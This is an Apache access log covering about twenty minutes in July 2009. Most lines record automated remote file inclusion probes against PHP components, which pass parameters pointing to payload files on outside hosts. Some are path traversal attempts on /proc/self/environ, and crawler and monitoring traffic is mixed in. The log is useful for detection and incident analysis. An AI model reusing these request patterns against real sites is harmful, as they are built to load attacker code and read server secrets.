61.78.62.84 - - [15/Jul/2009:00:06:03 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
61.78.62.84 - - [15/Jul/2009:00:06:07 -0400] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
89.234.63.107 - - [15/Jul/2009:00:06:09 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.234.63.107 - - [15/Jul/2009:00:06:09 -0400] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
89.234.63.107 - - [15/Jul/2009:00:06:09 -0400] "GET /logs/access_log.Q109052100//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
204.30.3.225 - - [15/Jul/2009:00:06:16 -0400] "GET /logs/error_log.Q109060600%20/e404.php?DOCUMENT_ROOT=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
123.143.98.5 - - [15/Jul/2009:00:06:46 -0400] "GET /e404.php?DOCUMENT_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:00:06:46 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:00:06:46 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
89.234.63.107 - - [15/Jul/2009:00:06:47 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.234.63.107 - - [15/Jul/2009:00:06:47 -0400] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
89.234.63.107 - - [15/Jul/2009:00:06:47 -0400] "GET /logs/access_log.Q109052100//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
66.249.68.70 - - [15/Jul/2009:00:07:40 -0400] "GET /images/items/61500002_thumb.jpg HTTP/1.1" 200 2296 "-" "Googlebot-Image/1.0"
82.194.87.219 - - [15/Jul/2009:00:07:44 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://webmaster-100.com/images/id? HTTP/1.1" 404 254 "-" "libwww-perl/5.822"
204.30.3.225 - - [15/Jul/2009:00:07:57 -0400] "GET /logs/error_log.Q109060600%20/e404.php?DOCUMENT_ROOT=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
61.78.62.84 - - [15/Jul/2009:00:08:02 -0400] "GET /logs/error_log.Q109052100//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
209.59.12.99 - - [15/Jul/2009:00:08:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [15/Jul/2009:00:08:22 -0400] "GET /logs/error_log.Q109052100//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
123.143.98.5 - - [15/Jul/2009:00:09:11 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:00:09:16 -0400] "GET /logs/access_log.Q109051300%20%20/e404.php?DOCUMENT_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.234.63.107 - - [15/Jul/2009:00:09:54 -0400] "GET /logs/access_log.Q109052100%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.55.209.250 - - [15/Jul/2009:00:10:00 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.55.209.250 - - [15/Jul/2009:00:10:00 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.55.209.250 - - [15/Jul/2009:00:10:00 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.55.209.250 - - [15/Jul/2009:00:10:01 -0400] "GET /logs/access_log.Q109061400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
74.55.209.250 - - [15/Jul/2009:00:10:01 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
74.55.209.250 - - [15/Jul/2009:00:10:01 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
74.55.209.250 - - [15/Jul/2009:00:10:01 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 255 "-" "XXXXXX"
74.55.209.250 - - [15/Jul/2009:00:10:01 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
74.55.209.250 - - [15/Jul/2009:00:10:01 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 228 "-" "XXXXXX"
74.55.209.250 - - [15/Jul/2009:00:10:01 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
74.55.209.250 - - [15/Jul/2009:00:10:01 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 228 "-" "XXXXXX"
74.55.209.250 - - [15/Jul/2009:00:10:01 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 255 "-" "XXXXXX"
89.234.63.107 - - [15/Jul/2009:00:10:08 -0400] "GET /logs/access_log.Q109052100%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/idxx.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
204.30.3.225 - - [15/Jul/2009:00:10:18 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:10:18 -0400] "GET /logs/error_log.Q109051100%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:10:18 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
72.30.161.230 - - [15/Jul/2009:00:10:28 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:10:28 -0400] "GET /logs/ HTTP/1.0" 200 9592 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.30.3.225 - - [15/Jul/2009:00:10:32 -0400] "GET /logs/access_log.Q109052400%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
74.55.209.250 - - [15/Jul/2009:00:10:33 -0400] "GET /logs/access_log.Q109060600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 255 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
74.55.209.250 - - [15/Jul/2009:00:10:33 -0400] "GET /logs/access_log.Q109060600/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
74.55.209.250 - - [15/Jul/2009:00:10:34 -0400] "GET /logs/access_log.Q109060600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 255 "-" "XXXXXX"
74.55.209.250 - - [15/Jul/2009:00:10:34 -0400] "GET /logs/access_log.Q109060600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 255 "-" "XXXXXX"
204.30.3.225 - - [15/Jul/2009:00:10:54 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:10:54 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:10:54 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:12:01 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:12:01 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:12:01 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:12:13 -0400] "GET /logs/access_log.Q109070200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
72.30.161.230 - - [15/Jul/2009:00:12:22 -0400] "GET /logs/error_log.Q109062800 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:12:26 -0400] "GET /logs/access_log.Q109060200 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.78.62.84 - - [15/Jul/2009:00:12:45 -0400] "GET /logs/error_log.Q109052100%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
204.30.3.225 - - [15/Jul/2009:00:12:46 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:13:00 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [15/Jul/2009:00:13:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [15/Jul/2009:00:13:11 -0400] "GET /logs/error_log.Q109052100%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?include_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
66.249.68.247 - - [15/Jul/2009:00:13:15 -0400] "GET /images/download_check_back.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
204.30.3.225 - - [15/Jul/2009:00:13:27 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:13:29 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:13:55 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
123.143.98.5 - - [15/Jul/2009:00:13:56 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
204.30.3.225 - - [15/Jul/2009:00:14:32 -0400] "GET /logs/access_log.Q109070200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
82.194.87.219 - - [15/Jul/2009:00:14:41 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://webmaster-100.com/images/id? HTTP/1.1" 404 254 "-" "libwww-perl/5.822"
72.30.161.230 - - [15/Jul/2009:00:14:06 -0400] "GET /logs/error_log.Q109061400 HTTP/1.0" 200 2680727 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:13:44 -0400] "GET /logs/access_log.Q109051300 HTTP/1.0" 200 5889638 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:15:02 -0400] "GET /logs/access_log.Q109071500 HTTP/1.0" 200 64425 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:14:54 -0400] "GET /logs/error_log.Q109052900 HTTP/1.0" 200 2862838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:15:03 -0400] "GET /logs/error_log.Q109052900 HTTP/1.0" 200 2862838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.229.45.106 - - [15/Jul/2009:00:15:41 -0400] "GET /logs/access_log.Q109061100//poll/booth.php?include_path=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
87.229.45.106 - - [15/Jul/2009:00:15:41 -0400] "GET /logs//poll/booth.php?include_path=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
87.229.45.106 - - [15/Jul/2009:00:15:41 -0400] "GET //poll/booth.php?include_path=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
87.229.45.106 - - [15/Jul/2009:00:15:41 -0400] "GET /logs/access_log.Q109061700//poll/booth.php?include_path=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
72.30.161.230 - - [15/Jul/2009:00:15:21 -0400] "GET /logs/access_log.Q109062800 HTTP/1.0" 200 2206435 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:15:50 -0400] "GET /logs/error_log.Q109071500 HTTP/1.0" 200 50267 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:16:27 -0400] "GET /logs/access_log.Q107092600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.194.87.219 - - [15/Jul/2009:00:16:28 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://webmaster-100.com/images/id? HTTP/1.1" 404 254 "-" "libwww-perl/5.822"
80.93.54.78 - - [15/Jul/2009:00:16:52 -0400] "GET /logs/access_log.Q109070200//index.php?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
80.93.54.78 - - [15/Jul/2009:00:16:52 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [15/Jul/2009:00:17:43 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
204.30.3.225 - - [15/Jul/2009:00:18:05 -0400] "GET /logs/error_log.Q109051100%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
204.30.3.225 - - [15/Jul/2009:00:18:05 -0400] "GET /logs/access_log.Q109052400%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
209.59.12.99 - - [15/Jul/2009:00:18:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [15/Jul/2009:00:18:13 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:15 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:15 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:15 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:15 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.161.230 - - [15/Jul/2009:00:18:08 -0400] "GET /logs/access_log.Q109052200 HTTP/1.0" 200 4757864 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:19:20 -0400] "GET /logs/error_log.Q109060300 HTTP/1.0" 200 1893815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.16.115.69 - - [15/Jul/2009:00:19:21 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:21 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:22 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:22 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:27 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:27 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:31 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.16.115.69 - - [15/Jul/2009:00:19:31 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.161.230 - - [15/Jul/2009:00:19:21 -0400] "GET /logs/error_log.Q109060300 HTTP/1.0" 200 1893815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:18:20 -0400] "GET /logs/access_log.Q109070200 HTTP/1.0" 200 5653087 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.18.31 - - [15/Jul/2009:00:21:08 -0400] "GET /logs/access_log.Q109051100/?_SERVER[DOCUMENT_ROOT]=http://www.warisan.gov.my/satu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.38.18.31 - - [15/Jul/2009:00:21:08 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.warisan.gov.my/satu.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.38.18.31 - - [15/Jul/2009:00:21:08 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.warisan.gov.my/satu.txt?? HTTP/1.1" 200 9592 "-" "Mozilla/5.0"
80.93.54.78 - - [15/Jul/2009:00:21:39 -0400] "GET /logs/error_log.Q109061400//index.php?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
72.30.161.230 - - [15/Jul/2009:00:22:14 -0400] "GET /logs/error_log.Q109071400 HTTP/1.0" 200 3225177 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.247 - - [15/Jul/2009:00:22:35 -0400] "GET /images/circle_convention_over.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
72.30.161.230 - - [15/Jul/2009:00:22:16 -0400] "GET /logs/error_log.Q109071400 HTTP/1.0" 200 3225177 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [15/Jul/2009:00:23:00 -0400] "GET /logs/access_log.Q109060400 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.78.62.84 - - [15/Jul/2009:00:23:03 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
61.78.62.84 - - [15/Jul/2009:00:23:03 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
61.78.62.84 - - [15/Jul/2009:00:23:03 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
61.78.62.84 - - [15/Jul/2009:00:23:03 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
61.78.62.84 - - [15/Jul/2009:00:23:03 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
61.78.62.84 - - [15/Jul/2009:00:23:03 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
61.78.62.84 - - [15/Jul/2009:00:23:03 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
61.78.62.84 - - [15/Jul/2009:00:23:04 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.own-team.xz.lt/perkosa.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
209.59.12.99 - - [15/Jul/2009:00:23:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.18.31 - - [15/Jul/2009:00:24:27 -0400] "GET /logs/access_log.Q109053000/?_SERVER[DOCUMENT_ROOT]=http://www.warisan.gov.my/satu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
